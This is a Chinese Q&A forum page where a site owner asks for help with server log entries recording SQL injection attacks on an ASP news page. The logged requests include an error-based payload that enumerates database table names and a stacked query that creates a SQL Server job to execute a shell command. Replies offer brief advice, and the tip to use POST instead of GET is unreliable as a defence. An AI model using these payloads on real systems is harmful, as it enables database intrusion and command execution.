网页被攻击 SQL注入

来源:百度知道 编辑:UC知道 时间:2024/05/05 19:14:18
能建议一下我现在应该怎么做吗?我看不懂这个,希望各位大虾帮帮忙啊,
009-05-18 03:49:21 W3SVC732116503 202.115.22.227 GET /imba/Asp/imba_news_detail.asp NewsId=4733%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))%20from(Select%20Top%20156%20id,name%20from%20[mgmt_200410]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0|12|80040e07|在将_varchar_值_'^mgmt_magazine_cate^'_转换成数据类型_int_时失败。 80 - 115.49.92.119 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 0

2009-05-17 13:32:48 W3SVC732116503 202.115.22.227 GET /IMBA/Asp/imba_news_detail.asp NewsId=4692;CREATE/**/TABLE/**/[JCZ3Tmp]([r]/**/nvarchar(4000)/**/NULL);use/**/msdb;exec/**/sp_delete_job/**/null,[x];exec/**/sp_add_job/**/[x];exec/**/sp_add_jobstep/**/Null,[x],Null,[1],[CMDEXEC],[cmd%20/c%20dir%20c:\%20%3E8705882];exec/**/sp_add_jobserver/**/Null,[x],@@servername;exec/**/sp_start_job/**/[x]--|30|80040e37|对象名__'news_center_inf

应该,不是吧

估计,在前台,你容许 用户,输入 字符,在后台,你要把它,转换成,数值型就错了

还有,在前台提交的时候,一般,是用 POST提交的,而不是用,GET 提交的。

-------------
这种问题,一般是写的代码有漏洞,

到公安局举报这个工击的ip地址。
你的浏览器能不能上,有没有其他的反应。具体些

去举报